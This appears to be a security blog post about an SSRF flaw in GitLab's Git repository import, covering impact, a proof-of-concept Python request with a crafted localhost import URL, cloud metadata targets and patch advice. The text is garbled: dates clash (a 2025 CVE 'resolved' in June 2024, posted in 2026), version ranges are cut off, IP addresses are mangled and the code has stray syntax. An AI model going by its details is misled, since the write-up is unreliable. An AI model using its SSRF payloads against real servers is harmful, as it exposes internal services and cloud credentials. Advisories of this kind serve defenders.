CVE-2025-12073 - Critical SSRF Vulnerability in GitLab Git Repository Import (Exclusive Deep Dive)

On June 2024, GitLab quietly resolved a dangerous security issue tracked as CVE-2025-12073. This Server-Side Request Forgery (SSRF) vulnerability affected GitLab Community Edition (CE) and Enterprise Edition (EE) installations from 18. up to but not including 18.6.6, 18.7 up to but not including 18.7.4, and 18.8 up to but not including 18.8.4. In simple terms, with the right prerequisites, an authenticated attacker could force the server to send requests to internal services, all by exploiting the Git repository import feature.

This blog post takes a close and easy-to-understand look at how the vulnerability works, its impact, how attackers could exploit it, and how to stay safe. This is an exclusive writeup, designed for security professionals, administrators, and anyone running a GitLab instance.

What is CVE-2025-12073?

GitLab's repository import function allows users to bring in projects from remote Git repositories using a URL. To avoid turning GitLab servers into abuse tools, protections exist to stop a user from importing from internal resources (like localhost, 127...1, metadata IPs, or cloud APIs). However, the remediation for CVE-2025-12073 reveals that attackers found a way to sidestep those checks, under certain circumstances.

Impact: An authenticated GitLab user could cause the server to reach out (via SSRF) to internal endpoints, which could lead to data leakage, further internal attack, or even full compromise, depending on what internal resources are exposed.

18.8 before 18.8.4

> Reference: GitLab Security Release Blog (2024-06-13)

Disallows URLs pointing to localhost, 127...1, or internal IPs

- Blocks non-HTTP protocols, like file:// or gopher://

But security researchers found that, in some situations, the validation could be bypassed. While the precise bypass technique hasn't been fully published, past instances used tricks like:

Manipulating the way host headers or path traversal is processed

A successful SSRF via project import could look like GitLab being forced to fetch a sensitive internal URL on behalf of the attacker. For example, reading data from a cloud metadata endpoint: http://169.254.169.254/latest/meta-data/.

Below is a pseudo-code/step-by-step on how the attack might look, for educational purposes only

import requests

# User logs in to GitLab and gets a session
session = login_to_gitlab('user', 'password')

# Attacker crafts a tricky repository import URL that avoids input filters
evil_import_url = "http://[:::::ffff:127...1]:80/private-api";

# Prepare project import request with the crafted SSRF URL
data = {
    'import_url': evil_import_url,
    'name': 'ssrf-test-project'
}

# POST to the project import endpoint (authenticated)
response = session.post('https://gitlab.local/projects/import';, data=data)

# If the server allows and fetches the URL, 
# the SSRF is successful, and the attacker can observe results or error messages
print(response.text)

*Note: The above is a simplified demonstration! The real exploit may use more complex encodings or abuse specific GitLab behaviors.*

Real-World Risks

- Cloud Metadata Leakage: Attackers could request URLs like http://169.254.169.254/ to harvest cloud authentication tokens (AWS, GCP, Azure, DigitalOcean).
- Access to Internal APIs: Some companies expose unprotected APIs to their internal network. SSRF could be a way in.
- Pivoting: With SSRF, attackers can escalate, move laterally, trigger additional vulnerabilities ('attack chains').

Upgrade to 18.6.6, 18.7.4, 18.8.4 or later.

- Apply security updates immediately if you allow project imports, especially for installations exposed to users you do not fully trust.

Reference:
- GitLab Release Notes (Official)
- NIST NVD Entry CVE-2025-12073 *(may be pending full details)*

Conclusion

CVE-2025-12073 is the latest reminder that SSRF remains one of the most critical flaws in modern web applications, especially those with automation and import features. If you run GitLab—even on an intranet or for personal use—patch promptly. SSRF is hard to detect and can be devastating if your internal network holds treasures behind “trusted” IPs.

Have questions or want to understand more about securing GitLab? Visit the GitLab Security Portal or read their official SSRF documentation.

Stay safe and keep your systems patched!

*Exclusive report for the security community. Share responsibly.*

Timeline

Published on: 02/11/2026 11:34:46 UTC
Last modified on: 02/11/2026 15:27:26 UTC